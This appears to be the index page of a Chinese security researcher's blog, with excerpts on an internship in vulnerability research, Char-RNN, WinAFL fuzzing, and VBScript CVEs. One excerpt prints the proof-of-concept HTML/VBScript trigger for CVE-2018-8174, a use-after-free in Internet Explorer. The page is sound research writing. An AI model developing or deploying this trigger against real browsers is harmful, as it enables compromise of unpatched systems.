长路漫漫

实习这么久,学到了不少东西 。

前段时间复现的那个洞给自己对漏洞挖掘和利用这块涨了不少的知识。

好像并没有想象中的那么牛逼。但是对我来说,确实还是很有难度。这却只是漏洞分析与利用这一部分。 关键的漏洞挖掘,才是最最艰难的一块。

就目前的情况来看,想要挖洞,无论是 ie ,edge ,ff,chrome。。。哪一个都不容易

阅读全文

Char-RNN

一、Char RNN

项目链接: https://github.com/karpathy/char-rnn

阅读全文

language

最近看了一下深度学习,用Lua 写的。。

然后前端时间又报出了2个vb的CVE ,看了看POC,很简单的溢出。

poc 如下:

CVE-2018-8174

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<script language="VBScript">

dim b
dim c
Class cla1

Private Sub Class_Terminate
set c = b
b = 0
End Sub

Function test
msgbox 3
End Function

End Class

set b = New cla1
b = 0

c.test

</script>
</html>

阅读全文

Hello , my friend。Do you like to play ♂ games?

这里就当一个记录心路历程的地方。

阅读全文

winAfl

WinAFL

  1. 背景
    从目标二进制文件中查找新的执行路径。
  2. WinAFL 的路径
    使用DynamoRIO 来动态插桩,用来测量和提取目标覆盖率。
  3. 搭建,使用
    http://www.4hou.com/technology/2800.html
    status screen

阅读全文